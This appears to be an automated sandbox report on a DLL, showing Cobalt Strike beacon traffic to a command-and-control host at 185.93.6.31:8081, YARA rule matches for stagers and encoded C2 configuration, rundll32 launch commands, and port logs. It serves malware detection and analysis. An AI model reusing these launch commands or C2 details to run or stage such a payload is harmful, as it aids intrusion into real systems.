          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=xSBMbWBJOMNiFcZsL65bpJJn-k8yfaPyRcKF3-DDQ9m2ysocVbe89ocfIe5aXQ6h6LxxhxuG32nApS2HuOVFDt-JsOrx4HLDeT6K7EBbgjvv6Kl58a1ql80azKRaZQCcMH9oeoUsusdb5i9rMr89xXSREEd4PribVZS3gRozk9yrfQWNUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=V7L_yNtK_RjAmKwP7UbPIAx-UDb_TjYfzINQKTBsvwe3MmIcq-FLgJgYPi73ecrNLx4XZnFmSLGLxv8XmNWCoFgl2goz52FyfACIJjeEnI6neAcSw5nk-iULjhQECL0sp40mhD5o6PVwW4lUeH8Qd6YizM3Pq8DausWAr_MjiiVR_YGEUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=LM835qE4iPa4C-BZBtQQmfqPwb9hPdrF0-HUYXbPNDiDbMypIAQauXGOmsEhpFqCU4qy0gNRktZhpbP8mgPfefzEMapD7CCUs-YXH-S_geeaIrdNXq4CSJeBPqjgsfLxWWFvnxtZDow5_8aR1XlycleBdvTNzf8OmLD8SxkAiPpOYlHJUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=GfTawrydrmy-wVDD83rNC06zbODuqTVdmRYTcDwX1XZqHlyziWMqWVvLt0GGiZgONGjnKMdSScYccbsoZDHToQNdJkUtNORspeocQ5yPFJQzPD_WLXn8OBHOWguGsZYz7Kv-1Vn4LGiHMrnE7muraqhFhuik6i40iUAhLsbnBXN3qZMiUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=aE_wOOS38uj_ZaP_0rvA0DODX8bAsznv835f2Q-RsPeIz23slBxEcKflMd7IhMU9EOMYlk6bR0G0O_DnpyiNUGfY1foMGm6CQ_2H1gh5k36YhQji_GTrChr2geQ79bLcmHApdAGV5wVPpoakR4Ifh5nfwz3wVs8qhTiPX8zehdVuAI50User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=rYKwfiB1D245RmfBh5mXAXvCRifgcF1dUqxT-feCs6ACIUsxoUmdIfDDHVmg6d0a0sc1SoIcFU7g6DRkG05Y4X2JtjLCoacMMquQh2XyBn8bbzDV3-OF0BbMuTBh_HVp2CzoB5oUiRS4skEJVDT16tbM8WxMgHiWGf1705hND2LPL9ZRUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=tbLArRDbtAMSh0qsXzzXZOL1do9C7y8yNVAJH5BRzxnGWEbcJSUwNveNrS4qz4JhmC79R2sUU6mwN6FHyHfJzq8bPCqBcv4DCawGLDDJDvufeiW5gT_mV72IQGQq94xcQO3kuvW-NgcrdKOrQi2xBQQDnIcIrDRbJQY7QWqhHxzb74lNUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000003.00000002.640651466.0000019BD8300000.00000020.00000001.sdmp, type: MEMORYMatched rule: Detects CobaltStrike sleep_mask decoder Author: yara@s3c.za.net
          Source: 00000005.00000002.641411926.00000243BEA20000.00000020.00000001.sdmp, type: MEMORYMatched rule: Detects CobaltStrike sleep_mask decoder Author: yara@s3c.za.net
          Source: 00000004.00000002.641582274.0000012256E00000.00000020.00000001.sdmp, type: MEMORYMatched rule: Detects CobaltStrike sleep_mask decoder Author: yara@s3c.za.net
          Source: 3.2.rundll32.exe.6bc00000.0.unpack, type: UNPACKEDPEMatched rule: Cobaltbaltstrike_RAW_Payload_http_stager_x64 author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
          Source: 5.2.rundll32.exe.6bc00000.0.unpack, type: UNPACKEDPEMatched rule: Cobaltbaltstrike_RAW_Payload_http_stager_x64 author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
          Source: 4.2.rundll32.exe.6bc00000.0.unpack, type: UNPACKEDPEMatched rule: Cobaltbaltstrike_RAW_Payload_http_stager_x64 author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
          Source: 00000005.00000002.636963833.000000006BC03000.00000004.00020000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_RAW_Payload_http_stager_x64 author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
          Source: 00000004.00000002.636959360.000000006BC03000.00000004.00020000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_RAW_Payload_http_stager_x64 author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
          Source: 00000003.00000002.640651466.0000019BD8300000.00000020.00000001.sdmp, type: MEMORYMatched rule: CobaltStrike_Sleep_Decoder_Indicator date = 2021-07-19, author = yara@s3c.za.net, description = Detects CobaltStrike sleep_mask decoder
          Source: 00000005.00000003.251028132.00000243BE620000.00000040.00000001.sdmp, type: MEMORYMatched rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike C2 encoded profile configuration
          Source: 00000005.00000003.251028132.00000243BE620000.00000040.00000001.sdmp, type: MEMORYMatched rule: CobaltStrike_MZ_Launcher date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike MZ header ReflectiveLoader launcher
          Source: 00000005.00000003.251028132.00000243BE620000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
          Source: 00000005.00000002.641133563.00000243BE250000.00000020.00000001.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_RAW_Payload_http_stager_x64 author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
          Source: 00000004.00000003.244001600.0000012256A00000.00000040.00000001.sdmp, type: MEMORYMatched rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike C2 encoded profile configuration
          Source: 00000004.00000003.244001600.0000012256A00000.00000040.00000001.sdmp, type: MEMORYMatched rule: CobaltStrike_MZ_Launcher date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike MZ header ReflectiveLoader launcher
          Source: 00000004.00000003.244001600.0000012256A00000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
          Source: 00000003.00000003.243495836.0000019BD7F00000.00000040.00000001.sdmp, type: MEMORYMatched rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike C2 encoded profile configuration
          Source: 00000003.00000003.243495836.0000019BD7F00000.00000040.00000001.sdmp, type: MEMORYMatched rule: CobaltStrike_MZ_Launcher date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike MZ header ReflectiveLoader launcher
          Source: 00000003.00000003.243495836.0000019BD7F00000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
          Source: 00000003.00000002.636991024.000000006BC03000.00000004.00020000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_RAW_Payload_http_stager_x64 author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
          Source: 00000003.00000002.640457266.0000019BD7B00000.00000020.00000001.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_RAW_Payload_http_stager_x64 author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
          Source: 00000005.00000002.641411926.00000243BEA20000.00000020.00000001.sdmp, type: MEMORYMatched rule: CobaltStrike_Sleep_Decoder_Indicator date = 2021-07-19, author = yara@s3c.za.net, description = Detects CobaltStrike sleep_mask decoder
          Source: 00000004.00000002.641196073.0000012256620000.00000020.00000001.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_RAW_Payload_http_stager_x64 author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
          Source: 00000004.00000002.641582274.0000012256E00000.00000020.00000001.sdmp, type: MEMORYMatched rule: CobaltStrike_Sleep_Decoder_Indicator date = 2021-07-19, author = yara@s3c.za.net, description = Detects CobaltStrike sleep_mask decoder
          Source: Process Memory Space: rundll32.exe PID: 5868, type: MEMORYSTRMatched rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike C2 encoded profile configuration
          Source: Process Memory Space: rundll32.exe PID: 3012, type: MEMORYSTRMatched rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike C2 encoded profile configuration
          Source: Process Memory Space: rundll32.exe PID: 1340, type: MEMORYSTRMatched rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike C2 encoded profile configuration
          Source: C:\Windows\System32\rundll32.exeCode function: 3_2_6BC01400
          Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000019BD7B00109
          Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000019BD8314EC0
          Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000019BD8319CB4
          Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000019BD831C810
          Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000019BD83143D0
          Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000019BD8326C60
          Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000019BD831BD54
          Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000019BD831B5E8
          Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000019BD83275D0
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000012256620109
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000012256E19CB4
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000012256E14EC0
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000012256E143D0
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000012256E26C60
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000012256E1C810
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000012256E275D0
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000012256E1BD54
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000012256E1B5E8
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000243BE250109
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000243BEA34EC0
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000243BEA39CB4
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000243BEA3C810
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000243BEA3B5E8
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000243BEA46C60
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000243BEA475D0
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000243BEA3BD54
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000243BEA343D0
          Source: GnGmRmwtZJjkTEt.dllStatic PE information: Number of sections : 20 > 10
          Source: GnGmRmwtZJjkTEt.dllStatic PE information: Section: .text IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_CNT_CODE, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
          Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000019BD8314EC0 CreateToolhelp32Snapshot,Process32First,ProcessIdToSessionId,FindCloseChangeNotification,
          Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\GnGmRmwtZJjkTEt.dll,gSDCSXjfiSV
          Source: unknownProcess created: C:\Windows\System32\loaddll64.exe loaddll64.exe 'C:\Users\user\Desktop\GnGmRmwtZJjkTEt.dll'
          Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\GnGmRmwtZJjkTEt.dll',#1
          Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\GnGmRmwtZJjkTEt.dll,gSDCSXjfiSV
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\GnGmRmwtZJjkTEt.dll',#1
          Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\GnGmRmwtZJjkTEt.dll',gSDCSXjfiSV
          Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\GnGmRmwtZJjkTEt.dll',#1
          Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\GnGmRmwtZJjkTEt.dll,gSDCSXjfiSV
          Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\GnGmRmwtZJjkTEt.dll',gSDCSXjfiSV
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\GnGmRmwtZJjkTEt.dll',#1
          Source: C:\Windows\System32\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
          Source: rundll32.exeString found in binary or memory: -addr
          Source: rundll32.exeString found in binary or memory: -start
          Source: classification engineClassification label: mal88.troj.evad.winDLL@9/0@0/1
          Source: GnGmRmwtZJjkTEt.dllStatic PE information: Image base 0x6bc00000 > 0x60000000
          Source: C:\Windows\System32\rundll32.exeCode function: 3_3_0000019BD7F04563 push esi; ret
          Source: C:\Windows\System32\rundll32.exeCode function: 3_3_0000019BD7F07CF6 push ecx; ret
          Source: C:\Windows\System32\rundll32.exeCode function: 3_3_0000019BD7F05BBF push eax; ret
          Source: C:\Windows\System32\rundll32.exeCode function: 3_3_0000019BD7F05B91 push eax; ret
          Source: C:\Windows\System32\rundll32.exeCode function: 3_3_0000019BD7F06B82 push ebx; ret
          Source: C:\Windows\System32\rundll32.exeCode function: 3_3_0000019BD7F06B22 push ebx; ret
          Source: C:\Windows\System32\rundll32.exeCode function: 3_3_0000019BD7F06216 push ecx; ret
          Source: C:\Windows\System32\rundll32.exeCode function: 3_3_0000019BD7F0487C push edx; ret
          Source: C:\Windows\System32\rundll32.exeCode function: 3_3_0000019BD7F04FFC push esi; ret
          Source: C:\Windows\System32\rundll32.exeCode function: 3_3_0000019BD7F05EEB push edx; ret
          Source: C:\Windows\System32\rundll32.exeCode function: 3_3_0000019BD7F076E7 push esp; ret
          Source: C:\Windows\System32\rundll32.exeCode function: 3_3_0000019BD7F076C4 push ebx; ret
          Source: C:\Windows\System32\rundll32.exeCode function: 3_3_0000019BD7F04EC5 push esp; ret
          Source: C:\Windows\System32\rundll32.exeCode function: 3_3_0000019BD7F0665B push ebp; ret
          Source: C:\Windows\System32\rundll32.exeCode function: 3_2_6BC119C8 pushfq ; ret
          Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000019BD7B00128 push eax; ret
          Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000019BD7B00109 push eax; ret
          Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000019BD830971E push cs; retf
          Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000019BD83250DB push ebp; iretd
          Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000019BD8325124 push ebp; iretd
          Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000019BD83250FB push ebp; iretd
          Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000019BD830935D push edi; iretd
          Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000019BD830AD58 push ebp; iretd
          Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000019BD83165F0 push cs; ret
          Source: C:\Windows\System32\rundll32.exeCode function: 4_3_0000012256A06B82 push ebx; ret
          Source: C:\Windows\System32\rundll32.exeCode function: 4_3_0000012256A05B91 push eax; ret
          Source: C:\Windows\System32\rundll32.exeCode function: 4_3_0000012256A05BBF push eax; ret
          Source: C:\Windows\System32\rundll32.exeCode function: 4_3_0000012256A06B22 push ebx; ret
          Source: C:\Windows\System32\rundll32.exeCode function: 4_3_0000012256A06216 push ecx; ret
          Source: C:\Windows\System32\rundll32.exeCode function: 4_3_0000012256A076E7 push esp; ret
          Source: C:\Windows\System32\rundll32.exeCode function: 4_3_0000012256A05EEB push edx; ret
          Source: GnGmRmwtZJjkTEt.dllStatic PE information: section name: .xdata
          Source: GnGmRmwtZJjkTEt.dllStatic PE information: section name: /4
          Source: GnGmRmwtZJjkTEt.dllStatic PE information: section name: /19
          Source: GnGmRmwtZJjkTEt.dllStatic PE information: section name: /31
          Source: GnGmRmwtZJjkTEt.dllStatic PE information: section name: /45
          Source: GnGmRmwtZJjkTEt.dllStatic PE information: section name: /57
          Source: GnGmRmwtZJjkTEt.dllStatic PE information: section name: /70
          Source: GnGmRmwtZJjkTEt.dllStatic PE information: section name: /81
          Source: GnGmRmwtZJjkTEt.dllStatic PE information: section name: /92

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Uses known network protocols on non-standard portsShow sources
          Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49740
          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49741
          Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49742
          Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49743
          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49744
          Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49745
          Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49746
          Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49747
          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49749
          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49751
          Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49754
          Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49755
          Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49756
          Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49757
          Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49758
          Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49759
          Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49762
          Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49763
          Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49764
          Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49765
          Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49766
          Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49767
          Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49768
          Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49769
          Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49770
          Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49787
          Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49790
          Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49809
          Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49810
          Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49811
          Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49815
          Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49818
          Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49821
          Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49836
          Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49850
          Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49851
          Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49852
          Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49853
          Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49854
          Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49855
          Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49856
          Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49857
          Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49858
          Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49859
          Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49861
          Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49865
          Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49866
          Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49867
          Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49868
          Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49869
          Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49870
          Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49871
          Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49872
          Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49873
          Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49874
          Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49875
          Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49876
          Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49877
          Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 8081
